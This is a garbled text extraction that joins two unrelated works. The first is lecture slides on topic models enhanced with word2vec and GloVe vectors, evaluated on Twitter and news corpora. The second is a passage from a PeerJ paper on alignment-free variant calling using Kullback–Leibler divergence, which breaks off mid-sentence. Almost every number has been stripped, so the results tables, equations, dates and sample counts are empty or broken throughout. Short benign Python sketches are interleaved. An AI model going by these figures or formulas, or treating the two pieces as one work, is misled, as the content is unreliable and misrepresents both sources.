-regularised log-loss (map estimation) lt = − ∑ w∈w k t,w � τt ·ωw − log( ∑ w ′∈w exp(τt ·ωw ′)) � + µ ‖ τt ‖ / outline introduction latent-feature topic models experimental evaluation conclusions and future work / goals of evaluation • a topic model learns document-topic and topic-word distributions: É topic coherence evaluates the topic-word distributions É document clustering and document classification evaluate the document-topic distribution – the latent feature component only directly changes the topic-word distributions, so these are challenging evaluations • do the word vec and glove word vectors behave differently in topic modelling? • we expect that the latent feature component will have the greatest impact on small corpora, so our evaluation focuses on them: dataset # labels # docs words/doc # types n newsgroups , . , n short ≤ words , . , n small docs . , tmn tagmynews , . , tmntitle tmn titles , . , twitter , . , / word vec-dmm on tagmynews titles corpus ( ) topic initdmm iter= iter= iter= iter= iter= iter= iter= iter= japan japan japan japan japan japan japan japan japan nuclear nuclear nuclear nuclear nuclear nuclear nuclear nuclear nuclear u.s. u.s. u.s. u.s. u.s. u.s. plant u.s. u.s. crisis russia crisis plant plant plant u.s. 
plant plant plant radiation china crisis radiation quake quake quake quake china nuke russia radiation crisis radiation radiation radiation radiation libya iran plant china china crisis earthquake earthquake earthquake radiation crisis radiation russia nuke nuke tsunami tsunami tsunami u.n. china nuke nuke russia china nuke nuke nuke vote libya libya power power tsunami crisis crisis crisis korea plant iran u.n. u.n. earthquake disaster disaster disaster europe u.n. u.n. iran iran disaster plants oil power government mideast power reactor earthquake power power plants oil election pakistan pakistan earthquake reactor reactor oil power japanese deal talks talks libya quake japanese japanese tepco plants • table shows the most probable topical words in topic found by -topic word vec-dmm on the tmn titles corpus • words found by dmm but not by word vec-dmm are underlined • words found by word vec-dmm but not dmm are in bold / word vec-dmm on tagmynews titles corpus ( ) topic topic topic topic initdmm iter= iter= initdmm iter= iter= initdmm iter= iter= initdmm iter= iter= egypt libya libya critic dies star nfl nfl nfl nfl law law china egypt egypt corner star sheen idol draft sports court bill texas u.s. mideast iran office broadway idol draft lockout draft law governor bill mubarak iran mideast video american broadway american players players bill texas governor bin opposition opposition game idol show show coach lockout wisconsin senate senate libya leader protests star lady american film nba football players union union laden u.n. leader lady gaga gaga season player league judge obama obama france protests syria gaga show tour sheen sheen n.f.l. governor wisconsin budget bahrain syria u.n. show news cbs n.f.l. league player union budget wisconsin air tunisia tunisia weekend critic hollywood back n.f.l. baseball house state immigration report protesters chief sheen film mtv top coaches court texas immigration state rights chief protesters box hollywood lady star football coaches lockout arizona vote court asia mubarak park fame wins charlie judge nflpa budget california washington u.n. russia crackdown takes actor charlie players nflpa basketball peru vote arizona war arab bahrain man movie stars men court game senate federal california • table shows most probable topical words in several topics found by -topic word vec-dmm on the tmn titles corpus • words found by dmm but not by w v-dmm are underlined • words found by w v-dmm but not dmm are in bold / topic coherence evaluation • lau et al. ( ) showed that human scores on a word intrusion task are highly correlated with the normalised pointwise mutual information (npmi) against a large external corpus (we used english wikipedia) • we found latent feature vectors produced a significant improvement of npmi scores on all models and corpora É greatest improvement when λ = (unsurprisingly) npmi scores on the n short dataset with topics, as the mixture weight λ varies from to / topic coherence on twitter corpus data method λ = . t= t= t= t= lda - . ± . - . ± . - . ± . - . ± . twitter w v-lda - . ± . - . ± . - . ± . - . ± . glove-lda - . ± . - . ± . - . ± . - . ± . improve. . . . . dmm - . ± . - . ± . - . ± . - . ± . twitter w v-dmm - . ± . - . ± . - . ± . - . ± . glove-dmm - . ± . - . ± . - . ± . - . ± . improve. . . . . 
• the normalised pointwise mutual information score improves for both lda and dmm on the twitter corpus, across a wide range of number of topics / document clustering evaluation • cluster documents by assigning them to the highest probability topic • evaluate clusterings by purity and normalised mutual information (nmi) (manning et al., ) evaluation of -topic lda on the n short corpus, as mixture weight λ varies from to • in general, best results with λ = . ⇒ set λ = . in all further experiments / document clustering of twitter data data method purity nmi t= t= t= t= t= t= t= t= lda . ± . . ± . . ± . . ± . . ± . . ± . . ± . . ± . twitter w v-lda . ± . . ± . . ± . . ± . . ± . . ± . . ± . . ± . glove-lda . ± . . ± . . ± . . ± . . ± . . ± . . ± . . ± . improve. . . . . . . . . dmm . ± . . ± . . ± . . ± . . ± . . ± . . ± . . ± . twitter w v-dmm . ± . . ± . . ± . . ± . . ± . . ± . . ± . . ± . glove-dmm . ± . . ± . . ± . . ± . . ± . . ± . . ± . . ± . improve. . . . . . . . . • on the short, small twitter dataset our models obtain better clustering results than the baseline models with small t. É with t = we obtain . % purity and . % nmi improvements • for small t ≤ , on the large datasets of n , tmn and tmntitle, our models and baseline models obtain similar clustering results. • with larger t our models perform better than baselines on the short tmn and tmntitle datasets • on the n dataset, the baseline lda model obtains better clustering results than ours • no reliable difference between word vec and glove vectors / document classification of n and n short corpora • train a svm to predict document label based on topic(s) assigned to document data model λ = . t= t= t= t= lda . ± . . ± . . ± . . ± . n w v-lda . ± . . ± . . ± . . ± . glove-lda . ± . . ± . . ± . . ± . improve. . . - . . lda . ± . . ± . . ± . . ± . n small w v-lda . ± . . ± . . ± . . ± . glove-lda . ± . . ± . . ± . . ± . improve. . . . . • f scores (mean and standard deviation) for n and n small corpora / document classification of tmn and tmn title corpora data model λ = . t= t= t= t= lda . ± . . ± . . ± . . ± . tmn w v-lda . ± . . ± . . ± . . ± . glove-lda . ± . . ± . . ± . . ± . improve. . . . . dmm . ± . . ± . . ± . . ± . tmn w v-dmm . ± . . ± . . ± . . ± . glove-dmm . ± . . ± . . ± . . ± . improve. . . . . lda . ± . . ± . . ± . . ± . tmntitle w v-lda . ± . . ± . . ± . . ± . glove-lda . ± . . ± . . ± . . ± . improve. . . . . dmm . ± . . ± . . ± . . ± . tmntitle w v-dmm . ± . . ± . . ± . . ± . glove-dmm . ± . . ± . . ± . . ± . improve. . . . . / document classification of twitter corpus data method λ = . t= t= t= t= lda . ± . . ± . . ± . . ± . twitter w v-lda . ± . . ± . . ± . . ± . glove-lda . ± . . ± . . ± . . ± . improve. . . . . dmm . ± . . ± . . ± . . ± . twitter w v-dmm . ± . . ± . . ± . . ± . glove-dmm . ± . . ± . . ± . . ± . improve. . . . . • for document classification the latent feature models generally perform better than the baseline models É on the small n small and twitter datasets, when the number of topics t is equal to number of ground truth labels (i.e. and correspondingly) our w v-lda model obtains +% higher f score than the lda model É our w v-dmm model achieves . % and . % higher f score than the dmm model on the tmn and tmntitle datasets with t = , respectively. 
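the document-classification protocol used above (train an svm on the per-document topic proportions and report the f1 score) can be sketched as follows; the feature matrix is a random stand-in for the document-topic distributions a trained lda or dmm model would produce, so the score it prints is meaningless and purely illustrative.

```python
import numpy as np
from sklearn.model_selection import train_test_split
from sklearn.svm import LinearSVC
from sklearn.metrics import f1_score

rng = np.random.default_rng(0)

# Stand-in for the document-topic proportions theta_d of a trained topic model:
# one row per document, one column per topic, rows summing to one.
n_docs, n_topics, n_labels = 400, 20, 4
theta = rng.dirichlet(alpha=np.ones(n_topics), size=n_docs)
labels = rng.integers(0, n_labels, size=n_docs)      # stand-in document labels

X_train, X_test, y_train, y_test = train_test_split(
    theta, labels, test_size=0.2, random_state=0)

clf = LinearSVC().fit(X_train, y_train)
pred = clf.predict(X_test)
print("micro-F1:", f1_score(y_test, pred, average="micro"))
```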
/ outline introduction latent-feature topic models experimental evaluation conclusions and future work / conclusions • latent feature vectors induced from large external corpora can be used to improve topic modelling É latent features significantly improve topic coherence across a range of corpora with both the lda and dmm models É document clustering and document classification also significantly improve, even though these depend directly only on the document-topic distribution • the improvements were greatest for small document collections and/or for short documents É with enough training data there is sufficient information in the corpus to accurately estimate topic-word distributions É the improvement in the topic-word distributions also improves the document-topic distribution • we did not detect any reliable difference between word vec and glove vectors / future directions • retrain the word vectors to fit the training corpus É how do we avoid losing information from external corpus? • more sophisticated latent-feature models of topic-word distributions • more efficient training procedures (e.g., using sgd) • extend this approach to a richer class of topic models / introduction latent-feature topic models experimental evaluation conclusions and future work submitted december accepted may published july corresponding author justin bedo, cu@cua .org academic editor mireille regnier additional information and declarations can be found on page doi . /peerj-cs. copyright bedo et al. distributed under creative commons cc-by . open access information theoretic alignment free variant calling justin bedo , , benjamin goudey , , jeremy wazny and zeyu zhou , ibm research—australia, carlton, vic, australia department of computing and information systems, the university of melbourne, parkville, vic, australia centre for epidemiology and biostatistics, the university of melbourne, parkville, vic, australia school of mathematics and statistics, the university of melbourne, parkville, vic, australia abstract while traditional methods for calling variants across whole genome sequence data rely on alignment to an appropriate reference sequence, alternative techniques are needed when a suitable reference does not exist. we present a novel alignment and assembly free variant calling method based on information theoretic principles designed to detect variants have strong statistical evidence for their ability to segregate samples in a given dataset. our method uses the context surrounding a particular nucleotide to define variants. given a set of reads, we model the probability of observing a given nucleotide conditioned on the surrounding prefix and suffixes of length k as a multinomial distribution. we then estimate which of these contexts are stable intra-sample and varying inter-sample using a statistic based on the kullback–leibler divergence. the utility of the variant calling method was evaluated through analysis of a pair of bacterial datasets and a mouse dataset. we found that our variants are highly informa- tive for supervised learning tasks with performance similar to standard reference based calls and another reference free method (discosnp++). comparisons against reference based calls showed our method was able to capture very similar population structure on the bacterial dataset. the algorithm’s focus on discriminatory variants makes it suitable for many common analysis tasks for organisms that are too diverse to be mapped back to a single reference sequence. 
subjects bioinformatics, computational biology
keywords alignment free, variant, assembly free, genome, bacteria, feature extraction

introduction
many sequencing studies begin by the transformation of raw sequence data to relatively few features, usually single-nucleotide variants. typically, this is done by aligning the individual sequence reads to a reference genome to identify single nucleotide differences from the reference. although straightforward, the genome alignment approach has several shortcomings:
• a suitable reference may not exist; this is especially important for unstable genomes such as the aneuploid genomes frequently encountered in cancer (beroukhim et al., ), and also for some organisms with large genetic diversity such as bacteria (ochman, lawrence & groisman, );
• selecting a reference may be difficult when there is uncertainty about what has been sampled; and
• it performs poorly when a sample contains significant novel material, i.e., sequences that are not simple variations of the reference.
existing reference-free approaches are either based on assembly (li, ), which possibly introduces misassembly biases, or on searching for structural motifs within a universal de bruijn graph of all samples (peterlongo et al., ; iqbal et al., ; uricaru et al., ) that correspond to simple variants. we present a variant calling algorithm to generate features from unaligned raw reads. rather than attempting to identify all genetic variation within a given set of samples, we instead focus on selected variants that have strong statistical evidence for their ability to segregate samples in a given dataset. such variants form useful features for many tasks including genomic prediction of a given phenotype, modelling population structure or clustering samples into related groups. our method uses the context surrounding a particular nucleotide to define variants. given a set of reads, we model the probability of observing a given nucleotide conditioned on the surrounding prefix and suffix nucleotide sequences of length k as a multinomial distribution. we then estimate which of these contexts form potential variants, i.e., those that are stable intra-sample and varying inter-sample, using a statistic based on the kullback–leibler divergence. given this list of candidate variants, we call those variants by maximum likelihood of our multinomial model. furthermore, we show that the size of the context k can be chosen using the minimum message length principle (wallace & boulton, ) and that our context selection statistic is γ-distributed. consequently, k can be determined from the data and the contexts surrounding variants can be selected with statistical guarantees on type- errors. the utility of the variant calling method was evaluated through simulation experiments and empirical analysis of a pair of bacterial datasets and a mouse dataset. through simulations we showed the method has good power and a well-controlled false positive rate for detecting variants, though the ability to detect rare variants required high depth and a large number of samples.
our empirical results indicated our variants are highly informative for antimicrobial resistance phenotypes on the bacterial datasets and were able to accurately capture population structure. on the mouse dataset, the variants were also found to be good for modelling coat colour. further investigations of the variants found for the bacterial dataset using a known reference sequence revealed variants associated with boxb repeat regions, a repeat previously used for population structure mapping (rakov, ubukata & robinson, ), suggesting the model can generate features for more complex genetic elements. these results suggest the variants are capturing genotypic variation well and can model heritable traits in different organisms. our proposed method will be of strongest utility when modelling of population structure, phylogenetic relationships or phenotypes from genotype for large scale datasets of organisms with either variable genomes (as is the case for many bacteria), or those lacking a reference genome.

methods
our variant calling method comprises two steps: modelling the probability that a base is observed in a sample given the surrounding context; and determining which contexts surround variable bases in a population represented by several samples. the former provides a mechanism to call variants in a sample given a set of contexts, and the latter determines the set of contexts associated with variants.

variant calling
we consider the case of variant calling directly from a collection of reads. let the random variable $x_{ij}$, taking values in $\{a,c,g,t\}$, denote the $j$th nucleotide of the $i$th read, with $1 \le i \le n$ and $1 \le j \le m_i$, where $n$ and $m_i$ are the number of reads and the number of nucleotides in read $i$.

definition (k-context): the k-context around a nucleotide $j$ consists of a k-prefix sequence $\pi_k(x_{i,j}) := [x_{i(j-k)}, x_{i(j-k+1)}, \ldots, x_{i(j-1)}]$ and a k-suffix sequence $\sigma_k(x_{i,j}) := [x_{i(j+1)}, x_{i(j+2)}, \ldots, x_{i(j+k)}]$. contexts that consist of only the prefix/suffix sequences are suffix/prefix-free.

definition (k-context probability): the k-context probability is the probability of observing a base at a particular position given the context, that is $p(x_{ij} \mid \pi_k(x_{i,j}), \sigma_k(x_{i,j}))$.

the k-context probabilities can be estimated from the data by maximising a pseudolikelihood. let
$$f(b, \pi_k, \sigma_k) := 1 + \sum_{ij} [\![\, x_{ij} = b \wedge \pi_k = \pi_k(x_{i,j}) \wedge \sigma_k = \sigma_k(x_{i,j}) \,]\!]$$
denote the counts of how often $b$ was observed with k-prefix $\pi_k$ and k-suffix $\sigma_k$ in the read set $x$, where $[\![\cdot]\!]$ is the iverson bracket. here the pseudocount encodes a weak uniform prior. the probability density estimate of observing a base $b$ in context $(\pi_k, \sigma_k)$ is then given by
$$\hat{p}(b \mid \pi_k, \sigma_k) := \frac{f(b, \pi_k, \sigma_k)}{\sum_{b'} f(b', \pi_k, \sigma_k)}.$$
the suffix/prefix free densities are thus $\hat{p}(b \mid \pi_k) = \sum_{\sigma_k} \hat{p}(b \mid \pi_k, \sigma_k)$ and $\hat{p}(b \mid \sigma_k) = \sum_{\pi_k} \hat{p}(b \mid \pi_k, \sigma_k)$. given a context $(\pi_k, \sigma_k)$, the base can be called as $\arg\max_b \hat{p}(b \mid \pi_k, \sigma_k)$, and similarly for prefix/suffix free densities.

variant finding
determining the list of variants consists of determining which contexts $(\pi_k, \sigma_k)$ surround a variable base in our population, then calling the base for each variant-defining context and each sample. we consider inter-sample variants and not intra-sample variants; we are interested in finding contexts which define variants that differ amongst samples and are not attributable to noise.
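a minimal sketch (not the authors' code) of the counting and base-calling step described in 'variant calling': counts are accumulated per (k-prefix, base, k-suffix) with a pseudocount, the context density is the normalised count, and a base is called by maximum probability. the pseudocount value of 1 is an illustrative choice for the weak uniform prior mentioned above.

```python
from collections import defaultdict

BASES = "acgt"

def context_counts(reads, k, pseudocount=1):
    # reads: iterable of strings over {a,c,g,t}; returns counts[(prefix, suffix)][base]
    counts = defaultdict(lambda: {b: pseudocount for b in BASES})
    for read in reads:
        for j in range(k, len(read) - k):
            prefix, base, suffix = read[j - k:j], read[j], read[j + 1:j + 1 + k]
            counts[(prefix, suffix)][base] += 1
    return counts

def p_hat(counts, prefix, suffix, base):
    ctx = counts[(prefix, suffix)]
    return ctx[base] / sum(ctx.values())

def call_base(counts, prefix, suffix):
    # maximum-probability base call for a given k-context
    ctx = counts[(prefix, suffix)]
    return max(ctx, key=ctx.get)

# example: call_base(context_counts(["acgtacgt", "acgaacgt"], k=2), "cg", "ac")
```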
in this section, we develop a statistic based on the kullback–leibler (kl) divergence that achieves these two points. let $\mathcal{X}$ be a set of samples, each consisting of a collection of reads as defined above. for each $x \in \mathcal{X}$, we refer to the $j$th nucleotide of the $i$th read as $x_{ij}$, the number of reads in the sample as $n_x$, and the number of nucleotides in read $x_i$ as $m_{xi}$. similarly to the previous section, we denote $f_x(b, \pi_k, \sigma_k)$ as the frequency of observing base $b$ given context $(\pi_k, \sigma_k)$ for sample $x$. as before, a pseudocount is used when estimating $f_x$ to encode a uniform prior.

the kl divergence measure provides a way of quantifying the differences between two probability distributions. we will develop a statistic based upon the kl-divergence that compares the individual sample distributions of nucleotide occurrence for a given context with a global expected distribution. contexts that significantly diverge from the global expected distribution surround a site which is variant in the population sample.

definition (kullback–leibler divergence): let $p$ and $q$ be two discrete probability densities over the domain $\mathcal{Y}$. the kullback–leibler (kl) divergence is
$$p(\cdot) \,\|_{kl}\, q(\cdot) := \sum_{y \in \mathcal{Y}} p(y) \log \frac{p(y)}{q(y)}.$$

definition (total divergence): the total divergence for a given context $(\pi_k, \sigma_k)$ is estimated as the total kl divergence between the samples in the dataset $\mathcal{X}$ and the expected probability distribution given the context:
$$d_{\mathcal{X}}(\pi_k, \sigma_k) := \sum_{x \in \mathcal{X}} \hat{p}_x(\cdot \mid \pi_k, \sigma_k) \,\|_{kl}\, q(\cdot \mid \pi_k, \sigma_k),$$
where
$$\hat{p}_x(b \mid \pi_k, \sigma_k) := \frac{f_x(b, \pi_k, \sigma_k)}{\sum_{b'} f_x(b', \pi_k, \sigma_k)}$$
denotes the probability density estimated for sample $x$ and context $(\pi_k, \sigma_k)$ and
$$q(b \mid \pi_k, \sigma_k) := \frac{\sum_{x \in \mathcal{X}} f_x(b, \pi_k, \sigma_k)}{\sum_{x \in \mathcal{X}, b'} f_x(b', \pi_k, \sigma_k)}.$$

the total divergence statistic is proportional to the expected kl-divergence between a sample and the global expected probability distribution. to see why this statistic is robust to noise, consider the case where variation is due purely to noise. as the noise distribution is independent of sample, it will be well modelled by the expected distribution $q$ and therefore the divergence between each sample and $q$ will be small. conversely, if variation is due to samples being drawn from two or more latent probability densities, then $q$ will be an average of these latent densities and divergence will be high.

the next theorem is crucial for determining when a particular divergence estimate indicates a significant divergence from the expected distribution $q$. using this theorem, we can use hypothesis testing to select which contexts are not well explained by $q$. these contexts not well explained by $q$ are variant and we call them as in 'variant calling.'

theorem . under random sampling from $q$, $d$ follows a $\gamma$ distribution.

the proof of this theorem is trivial given a well known result regarding the g-test (see sokal & rohlf ( )).

lemma. let $f_x$ be a frequency function and $g := \mathbb{E}[f_x]$. the g-test is
$$g := \sum_{x \in \mathcal{X}} \sum_{b \in \{a,t,c,g\}} f_x(b, \pi_k, \sigma_k) \log\left(\frac{f_x(b, \pi_k, \sigma_k)}{g(b, \pi_k, \sigma_k)}\right).$$
under the null hypothesis that $f_x$ results from random sampling from a distribution with expected frequencies $g$, $g$ follows a $\chi^2$ distribution with $|\mathcal{X}|$ degrees of freedom asymptotically.

from this lemma, the proof of theorem follows easily:

proof. $d$ is proportional to the g-test. as the g-test is $\chi^2$-distributed, $d$ is $\gamma$-distributed. □

clearly our statistic $d$ is very similar to $g$, but has an important property: $d$ is invariant to coverage.
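a small sketch (again not the authors' implementation) of the total divergence for one context: each sample's pseudocounted base counts are normalised into a density, the pooled counts give the expected density q, and the statistic is the sum of per-sample kl divergences from q.

```python
from math import log

BASES = "acgt"

def kl(p, q):
    return sum(p[b] * log(p[b] / q[b]) for b in BASES if p[b] > 0)

def total_divergence(per_sample_counts):
    # per_sample_counts: one dict base -> pseudocounted count per sample,
    # all for the same context (prefix, suffix)
    densities = []
    for counts in per_sample_counts:
        total = sum(counts.values())
        densities.append({b: counts[b] / total for b in BASES})
    pooled = sum(sum(c.values()) for c in per_sample_counts)
    q = {b: sum(c[b] for c in per_sample_counts) / pooled for b in BASES}
    return sum(kl(p, q) for p in densities)

# a context whose samples split between two alleles (e.g. mostly "a" in some samples,
# mostly "g" in others) yields a large value; pure sequencing noise stays close to q.
```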
as d operates on estimates of the probability rather than the raw counts, changes in coverage are effectively normalised out. this is advantageous for variant discovery as it avoids coverage bias and allows variants to be called for (proportionally) low-coverage areas, if statistical support for their variability in the population exists. to select contexts, aγ distribution is fitted to the data. for the results in our experiments, we used a bayesian mixture model with a β prior over the mixing weights whereby each context could originate from the null (γ) distribution or from a uniform distribution. the mixing weights were then used to determine if a context is not well supported by the null distribution. such a model comparison procedure has several advantages and directly estimates the probabilities of support by the data for each context (kamary et al., ), providing an easily interpretable quantity. choosing context size the problem of choosing context size k is difficult; if too large then common structures will not be discovered, and if too small then base calling will be unreliable. we propose to choose k using the minimum message length principle (wallace & boulton, ). consider a given sample x. the message length of a two-part code is the length of the compressed message plus the length of the compressor/decompresser. in our case, the length of the compressed message is given by the entropy of our above probability bedo et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. distribution: l(x;p̂(·|πk,σk)) :=− ∑ ij logp̂(xij|πk,σk). the compressor/decompresser is equivalent to transmitting the counts for the probability distribution. this can be thought of as transmitting a k length tuple of counts. let n = ∑ i(mi− k) be the total number of contexts in the read set (i.e., the total number of prefix and suffix pairs in the data). thus, ( n+ k+ − k+ − ) count distributions are possible amongst the number of total prefix and suffix pairs ( k× k = k distinct prefix/suffix pairs, and possible observable bases), giving a total message length of ml(x;p̂(·|πk,σk)) :=l(x;p̂(·|πk,σk))+log ( n + k+ − k+ − ) . approximating the r.h.s using stirling’s approximation and dropping constant terms yields ml ∼ ∝ l(x;p̂(·|πk,σk))+ log( ) ( k−( + k) + k ) + ( ( + k+n ) − ) log ( n + + k ) . for suffix free densities the message length simplifies to ml(x;p̂(·|πk)) :=l(x;p̂(·|πk))+log ( n + k+ − k+ − ) ∼ ∝ l(x;p̂(·|πk))+log( ) ( k− ( +k) +k ) + ( ( +k+n ) − ) log ( n + +k ) , and similarly for prefix free. prefix/suffix free contexts the method we have presented so far has been developed for any contexts defined by any combination of prefix and suffix. the question of whether prefix/suffix-free contexts or full contexts (both prefix and suffix) naturally arises. the decision depends on the type of variants of interest: using full contexts will restrict the variants to single nucleotide variants (snv), while one sided contexts allow for more general types of variants such as insertions and deletions. full contexts also have less power to detect variation caused by close-by snvs; two snvs in close proximity will create several different contexts when modelling with both prefixes and suffixes. it is also worth remarking that the choice between prefix and suffix free contexts is immaterial under the assumption of independent noise and sufficient coverage. thus, our experiments concentrate on suffix-free contexts as it is the more general case. 
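for the suffix-free case, the criterion above can be computed directly: the first part is the code length of the observed bases under the estimated densities, and the second is the cost of transmitting the count table over the (prefix, base) cells. the sketch below is my reading of the definitions in this section (an alphabet of four bases, hence $4^{k+1}$ cells for prefix-only contexts); it is illustrative, not the authors' code.

```python
from collections import defaultdict
from math import lgamma, log

BASES = "acgt"

def log2_binomial(n, r):
    # log2 of the binomial coefficient C(n, r), via log-gamma
    return (lgamma(n + 1) - lgamma(r + 1) - lgamma(n - r + 1)) / log(2)

def message_length_prefix_only(reads, k, pseudocount=1):
    counts = defaultdict(lambda: {b: pseudocount for b in BASES})
    contexts = []
    for read in reads:
        for j in range(k, len(read)):
            prefix, base = read[j - k:j], read[j]
            counts[prefix][base] += 1
            contexts.append((prefix, base))
    # part one: code length of the data under the fitted densities
    data_bits = -sum(log(counts[p][b] / sum(counts[p].values()), 2) for p, b in contexts)
    # part two: cost of the count table over 4^k prefixes x 4 observable bases
    cells = 4 ** (k + 1)
    table_bits = log2_binomial(len(contexts) + cells - 1, cells - 1)
    return data_bits + table_bits

# k would then be chosen as the minimiser, e.g.
# best_k = min(range(1, 17), key=lambda k: message_length_prefix_only(reads, k))
```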
reference-based variant calling to compare the ability of our proposed method to a reference-based approach, we have processed all datasets using a standard mapping-based snp calling pipeline. using bedo et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. samtools v . - , raw reads from each sample were mapped to the relevant reference sequence and sorted. the mapped reads are then further processed to remove duplicates arising from pcr artefacts using picard v . and to realign reads surrounding indels using gatk v . - . pileups are then created across all samples using samtools and snps are called using the consensus-method of bcftools v . - . the resulting snps were then filtered to remove those variants with phred-scaled quality score below , minor allele frequency below . or snps that were called in less than % of samples. results simulation study we first investigate the power and the false positive rate (fpr) of our method by simulations as minor allele frequency (maf), sequencing depth, and sample size are varied. a total of , contexts per sample, of which one was a variant site with two possible alleles across the population, were simulated by sampling counts from a multinomial distribution. this corresponds to a simulating a snp, indel or any other variant whose first base, i.e., the base directly following the context, is bi-allelic. each context was simulated with a sequencing read error of % by sampling from a multinomial distribution, with the total number of simulations per context determined by the specified sequencing depth. variants were determined by fitting a gamma distribution and rejecting at a level of p< . corrected for multiple testing by bonferroni’s method. this procedure is repeated , times for each combination of simulation parameters. figures and shows the results of the simulation. with a depth of our method is able to recover the variant site with high power when the maf is % or higher, even with few samples ( ). the fpr was also well controlled, but reduces sharply with moderate depth (> ) at samples, and is low at most depth for , samples. identification of rare variants at low sample sizes ( % maf at samples) is not reliable, however rare variants are still identifiable with high power at high depth and samples (depth greater than and , samples). empirical experiments we also evaluated our method on three different datasets: two datasets are of streptococcus pneumoniae bacteria, one collected in massachusetts (croucher et al., ) and the other in thailand (chewapreecha et al., a); and one mouse dataset (fairfield et al., ). the two s. pneumoniae datasets comprise and , samples sequenced using illumina sequencing technology. the jax mouse dataset (fairfield et al., ) contains sequenced exomes of inbred mouse lines. all experiments were conducted with suffix-free contexts and only contexts present across all samples were evaluated for variants. our method identified , variants in the massachusetts dataset, , in the thailand dataset, and , in the mouse dataset. we refer to these as kl variants. we also compare our method with a mapping-based snp calling approach on the s. pneumoniae datasets. using sequence for s. pneumoniae atcc (ncbi accession nc_ . ) as a reference, there were , and , snps called for the bedo et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://www.ncbi.nlm.nih.gov/nucleotide?term=nc_ . http://dx.doi.org/ . /peerj-cs. 
massachusetts and thailand datasets. to be comparable with the resulting binary snps calls, we transform our multi-allelic variants to binary variants with the major allele being one and other alleles being zero. finally, we compare our results with variants called by another reference-free caller discosnp++ (uricaru et al., ) (v . . ). discosnp++ finds , variants for the massachusetts s. pneumoniae data, and , variants for jax . discosnp++ results are not available on the thailand dataset as the software fails to run in reasonable time on such a large dataset.

figure power curves for , simulated contexts with a single variant context for varying depth and sample size (panels). the bi-allelic variant context was simulated , times and curves show the mean of the , simulations. the error for the mean is less than % in all cases.

figure false positive rate for , simulated contexts with a single variant context for varying depth and sample size (panels) as described in fig. . the error for the mean is less than % in all cases.

message lengths
our first experiment investigated the optimal k resulting from our message length criterion (see 'choosing context size'). figure shows the results of various context sizes on three samples, one from each of the massachusetts s. pneumoniae, thailand s. pneumoniae and jax mouse data. the s. pneumoniae massachusetts and thailand samples had the shortest message length at k= and k= respectively, and the s /svimj mouse line had the shortest message length at k= .

figure message length for prefix-only contexts on two s. pneumoniae samples from the massachusetts and thailand datasets, and the s /svimj mouse line from the jax dataset. the optimal k under the mml framework is k= for the s. pneumoniae massachusetts dataset, k= for the s. pneumoniae thailand dataset, and k= for jax .

to evaluate the stability of the message length criterion, the optimal k according to message length was calculated on all samples from the massachusetts data (table ). the majority of samples had an optimal length of k= , with the remainder being optimal at k= . investigation into the singleton sample with minimal length at k= revealed a failed sequencing with only , reads present.
we also evaluated all samples present in the jax dataset and found all but one samples had minimal message length at k= . the stability of k is therefore high and we use k = for the two s. pneumoniae datasets and k= for the jax mouse dataset henceforth in all experiments. bedo et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table count of samples in massachusetts data by optimal k. optimal k count table amr prediction results using kl variants. variants were discovered only on the massachusetts dataset and then called on both massachusetts and thailand datasets. each row indicates what dataset models were trained on and the columns denote the testing dataset. numbers are the area under the re- ceiver operating characteristic (aroc). the aroc was estimated using -fold cross-validation within datasets. the numbers in parentheses are the performance when predicting on standard snp calls (s) de- rived through a traditional alignment pipeline and discosnp++ (d) calls. discosnp++ results are not available on the thailand dataset as the software fails to run in reasonable time on such a large dataset. training dataset massachusetts thailand all massachusetts . (s: . , d: . ) . (s: . ) thailand . (s: . ) . (s: . ) all . supervised learning performance to investigate the robustness of our variants for genomic prediction tasks, we evaluated the ability of variants called on the massachusetts s. pneumoniae dataset for the prediction of benzylpenicillin resistance under different training and testing scenarios across the two s. pneumoniae datasets. each sample was labelled as resistant if the minimum inhibitory concentration exceeded . µg/ml (chewapreecha et al., b). in all tasks, a support vector machine (svm) (schölkopf & smola, ) was used to predict resistance from the variants, and the performance measured using the area under the receiver operating characteristic (aroc). table shows the results of the experiments. each row indicates what dataset models were trained on and the columns denote the testing dataset. for intra-dataset experiments (i.e., the diagonal), aroc was estimated using -fold cross validation. our variants are clearly capturing the various resistance mechanisms, as evident by the strong -fold cross validation predictive performance. in comparison to the traditional pipeline and discosnp++ features (on massachusetts data only) also performed well. given the high level of accuracy, the three methods do not differ significantly in performance. the model trained using our variants on the massachusetts data is moderately predictive on the thailand dataset. conversely, the model from the thailand dataset can also moderately predict resistance in the massachusetts data, but to a lesser degree. one possible explanation for this limited predictive ability is the existence of resistance mechanisms unique to each dataset, hence a model trained on one dataset will not capture unobserved mechanisms and consequently the model is unable to predict resistance arising form these unknown mechanisms. this hypothesis is supported by the strong performance observable on the diagonal: when combining both datasets and preforming cross-validation, the performance is high. bedo et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure roc produced from leave-one-out cross-validation performance predicting agouti coat colour from kl variants on jax mouse dataset. aroc is %. 
we also evaluated our variants for predicting coat colour on the jax mouse dataset (fairfield et al., ). as few samples are available ( labelled samples), we reduced the problem to a -class classification problem, classifying coat colour into agouti or not. this led to a well balanced classification problem with samples in the agouti classes and not. the performance for this task was estimated at % aroc using leave-one-out (loocv) cross-validation, suggesting the variants are also predictive of heritable traits in higher level organisms. fig. shows the roc for this classification problem. population structure finally, we investigate the population structure captured by kl variants and the snp calls on the massachusetts dataset. the population structures were estimated using principle component analysis (pca), a common approach whereby the top principal components derived across all genetic variants reflect underlying population structure rather than the studied phenotype of interest (price et al., ). five sub-populations (clusters) were identified using k-means on the first two principal components from the snp data. projecting those clusters on to the principal component scores of our variants (fig. ) results in highly concordant plots. four out of the five clusters can be easily identified using our variants, indicating the detected variation preserves population structures well. a canonical correlation analysis (cca) was performed to further assess the similarities between the two feature sets (table ). regularisation was used to find the canonical vectors as the cross-covariance matrices are singular for our dataset. as there are significantly more features than samples, regularised cca was used and the correlation between projections estimated using samples of leave-one-out bootstrap (hastie, tibshirani & friedman, bedo et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure first two principal components derived from alignment-based snp calls (a) and from vari- ants detected by our method (b) applied to the massachusetts s. pneumoniae 